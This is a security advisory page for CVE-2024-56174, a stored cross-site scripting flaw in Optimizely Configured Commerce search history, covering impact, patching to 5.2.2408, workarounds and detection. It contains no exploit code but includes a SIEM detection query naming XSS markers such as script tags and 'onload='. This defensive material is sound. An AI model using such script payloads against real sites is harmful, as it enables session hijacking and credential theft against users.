CVE-2024-56174
📋 TL;DR
This vulnerability allows attackers to inject malicious scripts into Optimizely Configured Commerce search history, which then execute in users' browsers when they view their search history. It affects all users of Optimizely Configured Commerce versions before 5.2.2408 who have search functionality enabled.
💻 Affected Systems
- Optimizely Configured Commerce
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, redirect users to malicious sites, perform actions on behalf of authenticated users, or install malware via drive-by downloads.
Likely Case
Session hijacking, credential theft, and unauthorized actions performed in the context of authenticated users.
If Mitigated
Limited to data exfiltration from the current user's session if proper input validation and output encoding are implemented.
🎯 Exploit Status
Requires attacker to have ability to inject payloads into search history, typically through crafted search queries.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.2.2408
Vendor Advisory: https://support.optimizely.com/hc/en-us/articles/32344323720973-Configured-Commerce-Security-Advisory-COM-2024-01
Restart Required: Yes
Instructions:
1. Download Optimizely Configured Commerce version 5.2.2408 or later from official sources. 2. Backup current installation and database. 3. Apply the update following Optimizely's upgrade documentation. 4. Restart all application services. 5. Verify the update was successful.
🔧 Temporary Workarounds
Disable Search History
allTemporarily disable search history functionality to prevent payload storage and execution.
Modify application configuration to disable search history features
Implement Input Validation
allAdd server-side validation to sanitize search query inputs before storage.
Implement input validation filters for all search parameters
🧯 If You Can't Patch
- Implement WAF rules to block XSS payloads in search parameters
- Enable Content Security Policy (CSP) headers to restrict script execution
🔍 How to Verify
Check if Vulnerable:
Check if your Optimizely Configured Commerce version is below 5.2.2408 and search history functionality is enabled.Check Version:
Check application version in admin panel or via version files in installation directoryVerify Fix Applied:
Verify the application version is 5.2.2408 or higher and test search functionality with XSS payloads to ensure they are properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual search queries containing script tags or JavaScript code
- Multiple failed search attempts with suspicious patterns
Network Indicators:
- Unexpected outbound connections from user browsers after search actions
- Suspicious referrer headers in requests
SIEM Query:
search 'script' OR 'javascript:' OR 'onload=' in search query logs